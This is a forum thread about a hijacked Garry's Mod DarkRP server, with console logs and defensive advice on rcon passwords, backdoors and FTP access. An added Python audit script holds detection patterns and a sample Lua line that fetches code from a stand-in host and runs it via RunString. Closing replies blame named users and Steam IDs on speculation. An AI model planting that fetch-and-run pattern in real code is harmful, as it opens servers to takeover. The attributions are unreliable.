My friend's DarkRP server was hacked by (what seems to be) the Syrian Electronic Army this afternoon.

Here are a few screenshots.

(Hacker’s steam ID is in the second screenshot)

The console screenshots tell the story.

  • A guy somehow finds a way to unban himself (from what the head admin says the initial ban was from an attack of the same sort)
  • Temporarily shuts down the server, displaying some sort of propaganda/advert/whatever
  • Changes the loading screen html to a separate image saying something along the lines of “Why must the United States government interfere with our internal affairs?”
  • Automatically bans you upon re-connecting.

The logs are nothing that’s not in the screens already, but this comes from another admin.

(Console) unbanned steamid STEAM_0:0:49191585 (mom im japanese now)
➡PT➡JimmyDean suicided!
[DarkRP] ➡PT➡JimmyDean was killed by Himself with a suicide trick
(OOC) Soul <3: There we go.
(OOC) Soul <3: wait wat.
Client "newtee2" spawned in server <STEAM_0:0:12235695> (took 24 seconds).
[DarkRP] newtee2 (STEAM_0:0:12235695) has joined the game
(OOC) -ULTI- Shinnobisty5: Oh god.
(OOC) -ULTI- Shinnobisty5: Not again.
(OOC) Soul <3: i thought he was supposed to be banned
(OOC) Soul <3: OH SHEIT
ULTI Tanner teleported to -ULTI- Shinnobisty5
(OOC) Mark Bessette: hey shinno
(OOC) -ULTI- Shinnobisty5: He is using a backdoor
(OOC) -ULTI- Shinnobisty5: -.-
Client "Handsome Matt" spawned in server <STEAM_0:0:49191585> (took 28 seconds).
[DarkRP] Handsome Matt (STEAM_0:0:49191585) has joined the game
Soul <3 teleported to -ULTI- Shinnobisty5
Soul <3 killed mom im japanese now using m9k_striker12
[DarkRP] mom im japanese now was killed by Soul <3 with a m9k_striker12
Dropped "mom im japanese now" from server<STEAM_0:0:49191585>
[DarkRP] mom im japanese now (STEAM_0:0:49191585) disconnected
-ULTI- Shinnobisty5 banned mom im japanese now permanently (Quit it RB)
Soul <3 returned Themself to their original position
ULTI Tanner teleported to loroguy
(OOC) aidanpot1: what shinno?
Console set your money to $0.
(OOC) Soul <3: he was the guy who hacked us before
Commencing connection retry to [IP]
Client sending to server with no netchannel!
Client sending to server with no netchannel!
Connecting to [IP]
Connected to [IP]
DarkRPMap: rp_downtown_v4c_v2
Players: 4 / 37
Build: 5692
Server Number: 1
[Server Name]

Do you have your rcon password in your server.cfg?
Try typing ss_texta in your console to see if it gives you an unknown command.
Check if you have any suspicious runstrings in any of your lua files.
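
The two checks suggested in the post above, written out as a small Python audit. This is an added example, not code from anyone in the thread: it flags a non-empty rcon_password line in server.cfg and any RunString / RunStringEx / CompileString call in Lua files. The pattern list is a heuristic picked for this example, the `cfg/server.cfg` layout under the scanned root is an assumption, and the sample inputs are constructed.

```python
import re
from pathlib import Path

# Heuristic patterns chosen for this example; hits need manual review.
DYNAMIC_EXEC = re.compile(r"\b(RunString(?:Ex)?|CompileString)\s*\(")
REMOTE_FETCH = re.compile(r"\bhttp\.(?:Fetch|Post)\s*\(")
RCON_LINE = re.compile(r'^\s*rcon_password\s+"?[^"\s/]+', re.IGNORECASE)

def scan_lua(text):
    """Return (line_no, reason, line) for each line that runs a string as code."""
    fetches = bool(REMOTE_FETCH.search(text))
    findings = []
    for no, line in enumerate(text.splitlines(), 1):
        m = DYNAMIC_EXEC.search(line)  # comments are scanned too: over-report
        if m:
            reason = m.group(1)
            if fetches:
                reason += " in a file that also fetches remote content"
            findings.append((no, reason, line.strip()))
    return findings

def scan_cfg(text):
    """Return line numbers that set a non-empty rcon_password."""
    return [no for no, line in enumerate(text.splitlines(), 1)
            if RCON_LINE.match(line)]

def scan_tree(root):
    """Audit <root>/cfg/server.cfg and every .lua file below root (assumed layout)."""
    root, report = Path(root), {}
    cfg = root / "cfg" / "server.cfg"
    if cfg.is_file():
        lines = scan_cfg(cfg.read_text(errors="replace"))
        if lines:
            report[str(cfg)] = [(n, "rcon_password in server.cfg", "") for n in lines]
    for lua in sorted(root.rglob("*.lua")):
        hits = scan_lua(lua.read_text(errors="replace"))
        if hits:
            report[str(lua)] = hits
    return report

# Constructed samples, not taken from the affected server.
SAMPLE_LUA = '''hook.Add("Initialize", "motd", function()
    http.Fetch("http://example.invalid/x", function(body) RunString(body) end)
end)
'''
SAMPLE_CFG = 'hostname "My DarkRP"\nrcon_password "changeme"\n'

if __name__ == "__main__":
    print(scan_lua(SAMPLE_LUA))
    print(scan_cfg(SAMPLE_CFG))
```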

LeyAC just released publicly. Download it, lock the server, do what the config says, and then you’ll be fine.

No it won’t.
I have no idea what makes you think that.

I’m not the server owner but I’ll get this to him ASAP. Thanks a bunch.

Turns out the loading screen & title were changed, possibly other stuff too. Still working on getting the logs up.

Try A) Resetting the server and setting up LeyAC.
B) Get a new IP and server name (This worked for me at one point)

Just joined a server that was hacked.
It’s not ss_texta so it’s most likely the rcon password in the server config.

Explain to me how LeyAC is going to prevent the “hackers” from using rcon?

Hide the RCON in the command line rather than in the server.cfg. Problem solved.

The Logs are up. Nothing that isn’t in the screenshots already though.

Again, Get LeyAC, hide the Rcon in the command line.

Well, just checked the server. There are 0 open net.Receive() exploits, therefore the last remaining possible options are:

a. Delete your rcon
b. He has access to FTP

check em both

wow thx narwhal, master cheet bloker!

I’ll let the owner know ASAP.

LeyAC only stops public hacks (probably a few private), but that doesn’t mean it stops all cheats being used. The best solution would be either to check for backdoor addons, hide the rcon password, or change the rcon password. Or if the FTP is compromised, I suggest contacting the server provider/host to change those passwords and usernames too.

remove your rcon password from the server.cfg

This seems a bit more like a script kiddie, rather than a private hacker. Also, SteamID in the photos might be faked. A hacker group I dealt with a while back had some way to make them look like another person and have that person’s steamid.

Anyone else confused? I’m just going to stay out of this and mind my own business elsewhere. Good luck with…all this.

Good luck to you as well, SyrianEA, who knows, You might have a good point.

Handsome Matt (STEAM_0:0:49191585)

this is rbreslow btw.

[editline]27th September 2014[/editline]

oh wait that’s actually Extronic rbreslow is just another fuck nugget using my name.

Isn’t that Steam ID rbreslow’s? It has the name spidermanturnoffthedark, which is rbreslow’s Steam ID according to his Facepunch profile.

Also RBreslow is the one who made the Purge script, and if you look on coderhire it was RBreslow same steamID as the one that did that hack. O.o -fishhy-